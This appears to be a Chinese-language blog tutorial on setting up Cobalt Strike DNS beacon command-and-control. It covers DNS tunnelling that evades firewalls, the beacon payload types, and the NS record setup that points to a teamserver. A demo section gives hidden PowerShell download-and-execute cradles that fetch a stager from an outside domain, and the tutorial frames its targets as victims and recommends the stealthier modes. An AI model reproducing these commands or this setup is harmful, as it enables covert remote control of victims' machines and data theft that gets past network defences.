1.dns木马
dns木马因为隐蔽性好,在受害者不会开放任何端口 可以规避防火墙协议,走的是53端口 (服务器),防火墙不会拦截,缺点响应慢。
2.dns beacon的工作过程
在 dns beacon使用dns隧道的过程
受害者在执行我们的传输器下载完木马之后就会发出a记录的请求,受害者首先会请求本地的hosts文件 ,再去请求本地的dns 能不能告诉123456.test.1377day.com 的ip多少,如果本地dns存在记录就返回ip,没有就会去查找root 根dns 不存在记录, 接着就会访问com的dns 没有就会去查找dnspot的dns 如果都不存在 就会去查找名称服务器 的。 这个是就会访问 teamserver的服务器 在teasmserver的服务器上也有dns 刚好存在记录 就会返回ip 同时teasmserver 会有dns beacon的信息 返回受害者 受害者再请求危险的a记录到teamserver。 这就是dns beacon的工作过程。
3.DNS beacon的类型
windows/beacon_dns/reserve_http (传输数据小)
有效载荷通过HTTP连接分阶段。当您创建此侦听器时,请注意您正在配置主机和端口Cobalt Strike将使用通过HTTP分阶段此有效负载。当您选择设置此有效负载时,Cobalt Strike在端口53上站起来的DNS服务器。
beacon_dns/reserve_http(支持命令切换到该模式:mode dns)
将http通信方式,改为了使用dns的a记录方式进行通信。速度较慢,但非常隐蔽,推荐使用!
beacon_dns/reserve_dns_txt(支持命令切换到该模式:mode dns-txt)
同上,只是改为使用dns的txt方式进行通信,传输的数据量更大,推荐使用!
windows/beacon_dns/reverse_dns_txt (传输数据大)
有效负载使用DNS TXT记录下载和分级混合HTTP和DNS beacon。当您创建此侦听器时,请注意,您正在配置该有效负载将用于HTTP通信的端口。再次,Cobalt Strike知道在53端口站起来一个DNS服务器。
以上都是非持续性的工作。
4.域名创建ns指向
首先指向a记录test.1377day.com 指向 teamserver
接着创建三个ns记录 分别c1,c2,c3指向test.1377day.com
新建监听器
传输地址
设置好查看监听器
5.测试环境
nslookup
server test.1377day.com
123456(这个是任意的)
nslookup 123456.c1.1377day.com
dig +trace 123456.c1.1377day.com
6.实战演示
a记录
powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://test.1377day.com:80/a'))"
dns-txt
ns txt记录
powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://test.1377day.com:80/dns'))"
checkin 强制被控端(受害人主动请求)
转换协议
mode http dns dns-txt
———————————————————————————————为你,我愿化成天使守护你